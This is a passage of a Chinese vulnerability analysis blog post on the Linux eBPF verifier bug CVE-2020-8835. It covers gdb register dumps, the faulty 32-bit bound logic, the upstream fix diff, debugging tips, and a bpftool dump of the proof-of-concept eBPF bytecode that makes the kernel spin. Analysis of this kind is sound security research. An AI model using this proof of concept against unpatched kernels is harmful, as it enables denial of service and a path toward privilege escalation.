map_ptr = 0x0 <fixed_percpu_data>,
btf_id = 0x0,
raw = 0x0
},
off = 0x0,
id = 0x0,
ref_obj_id = 0x0,
var_off = {
value = 0x10300000,
mask = 0x7f
},
smin_value = 0xffffffff5fcfcfd0,
smax_value = 0x5fcfcfcf,
umin_value = 0x0,
umax_value = 0xffffffffffffffff,
parent = 0x0 <fixed_percpu_data>,
frameno = 0x0,
subreg_def = 0x8,
live = REG_LIVE_WRITTEN,
precise = 0x1
}

coerce_reg_to_size转为32位:

$r0 = {
type = SCALAR_VALUE,
{
range = 0x0,
map_ptr = 0x0 <fixed_percpu_data>,
btf_id = 0x0,
raw = 0x0
},
off = 0x0,
id = 0x0,
ref_obj_id = 0x0,
var_off = {
value = 0x10300000,
mask = 0x7f
},
smin_value = 0x0,
smax_value = 0xffffffff,
umin_value = 0x0,
umax_value = 0xffffffff,
parent = 0x0 <fixed_percpu_data>,
frameno = 0x0,
subreg_def = 0x8,
live = REG_LIVE_WRITTEN,
precise = 0x1
}

最后,在__update_reg_bounds函数中,寄存器被变为:

$r0 = {
type = SCALAR_VALUE,
{
range = 0x0,
map_ptr = 0x0 <fixed_percpu_data>,
btf_id = 0x0,
raw = 0x0
},
off = 0x0,
id = 0x0,
ref_obj_id = 0x0,
var_off = {
value = 0x10300000,
mask = 0x7f
},
smin_value = 0x10300000,
smax_value = 0x1030007f,
umin_value = 0x10300000,
umax_value = 0x1030007f,
parent = 0x0 <fixed_percpu_data>,
frameno = 0x0,
subreg_def = 0x8,
live = REG_LIVE_WRITTEN,
precise = 0x1
}

=%200×303030%20goto%20pc+2″>9: (76) if w0 s>= 0x303030 goto pc+2

相关代码为:

case BPF_JSGE:
if (reg->smin_value >= sval)
return 1;
else if (reg->smax_value < sval)
return 0;
break;

这里reg->smin_value0x10300000sval0x303030,可以看到这里会返回1,表示该if语句恒成立

那么从此刻开始,下一个被检测的语句就变成了第12句,而第10和第11句就被patch成了goto pc-1

然而,在实际的计算过程中,此刻的w00xCFD0,小于0x303030,就会导致真正在执行的过程中,内核会执行goto pc-1,导致空转,死循环

 

深入思考

作者是如何修复该漏洞的?

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 047b2e8..2a84f73 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -1036,17 +1036,6 @@ static void __reg_bound_offset(struct bpf_reg_state *reg)
reg->umax_value));
}
-static void __reg_bound_offset32(struct bpf_reg_state *reg)
-{
-    u64 mask = 0xffffFFFF;
-    struct tnum range = tnum_range(reg->umin_value & mask,
-                       reg->umax_value & mask);
-    struct tnum lo32 = tnum_cast(reg->var_off, 4);
-    struct tnum hi32 = tnum_lshift(tnum_rshift(reg->var_off, 32), 32);
-
-    reg->var_off = tnum_or(hi32, tnum_intersect(lo32, range));
-}
-
/* Reset the min/max bounds of a register */
static void __mark_reg_unbounded(struct bpf_reg_state *reg)
{
@@ -5805,10 +5794,6 @@ static void reg_set_min_max(struct bpf_reg_state *true_reg,
/* We might have learned some bits from the bounds. */
__reg_bound_offset(false_reg);
__reg_bound_offset(true_reg);
-    if (is_jmp32) {
-        __reg_bound_offset32(false_reg);
-        __reg_bound_offset32(true_reg);
-    }
/* Intersecting with the old var_off might have improved our bounds
* slightly.  e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
* then new var_off is (0; 0x7f...fc) which improves our umax.
@@ -5918,10 +5903,6 @@ static void reg_set_min_max_inv(struct bpf_reg_state *true_reg,
/* We might have learned some bits from the bounds. */
__reg_bound_offset(false_reg);
__reg_bound_offset(true_reg);
-    if (is_jmp32) {
-        __reg_bound_offset32(false_reg);
-        __reg_bound_offset32(true_reg);
-    }
/* Intersecting with the old var_off might have improved our bounds
* slightly.  e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
* then new var_off is (0; 0x7f...fc) which improves our umax.

可以看到,作者只删除了__reg_bound_offset32这一函数便完成了漏洞的修补

为什么__reg_bound_offset32函数会导致漏洞呢?

如果将该函数patch掉,发现,在执行完第五句指令之后,r0->var_off = {0x0, 0x1ffffffff},而不是patch前的`r0->var_off = {0x30303020, 0x10000001f}

正是由于这里var_off的偏差,如同导火索一般,导致在之后的ALU运算中,内核在调用__update_reg_bounds等函数来更新边界的过程中出现了偏差,导致检验系统的出错

另外,由于系统增加了patch dead code的操作,导致想要利用漏洞构造任意读写的难度大大增加

 

调试技巧

编译选项

可以将内核中debug info打开,然后再编辑.config文件,开启所有带有BPF字样的配置

其中,CONFIG_BPF_SYSCALL必须打开,不然无法使用bpf系统调用

其他的配置中,某个配置没有打开会导致gdb调试的时候无法在相关函数下断点,而我并没有找是哪一个配置,索性就全部打开

调试

主要调试的代码位于kernel/bpf/verifier.c中,可以根据源代码,利用b kernel/bpf/verifier.c:行数的方式下断点

另外,调试的时候Poc中最后一个跳转最好改变一下,比如从JSGE改为JSLT,使条件不成立,这样可以方便我们多次调试

打印内核中载入的eBPF程序

可以将内核源码复制到镜像中,然后在虚拟机中进入tools/bpf/bpftool目录下,执行make,编译出bpftool

编译完成之后,有两条相关指令

./bpftool p s会显示出内核中载入的eBPF程序的id等信息

root@syzkaller:~# ./bpftool p s
5: socket_filter  tag 31bce63e92f471c4  gpl
loaded_at 2020-04-17T03:31:44+0000  uid 1000
xlated 88B  jited 89B  memlock 4096B

./bpftool p d x i id可以打印出具体的eBPF程序

root@syzkaller:~# ./bpftool p d x i 5
0: (b7) r0 = 808464432
1: (7f) r0 >>= r0
2: (14) w0 -= 808464432
3: (07) r0 += 808464432
4: (b7) r1 = 808464432
5: (de) if w1 s<= w0 goto pc+0
6: (07) r0 += -2144337872
7: (14) w0 -= -1607454672
8: (76) if w0 s>= 0x303030 goto pc+1
9: (05) goto pc-1
10: (95) exit

 

链接

[1] https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f2d67fec0b43edce8c416101cdc52e71145b5fef

[2] https://elixir.bootlin.com/linux/v5.6-rc5/source/kernel/bpf/verifier.c#L9984

[3] https://github.com/DayJun/Blogs/blob/master/Articles/CVES/CVE-2020-8835/poc.c

[4] https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/snapshot/linux-641cd7b06c911c5935c34f24850ea18690649917.tar.gz

本文由安全客原创发布转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/203284

本文来源于Lonely Blog -全球网络安全资讯平台, 转载请注明出处: https://blog.wuhao13.xin/170.html

标签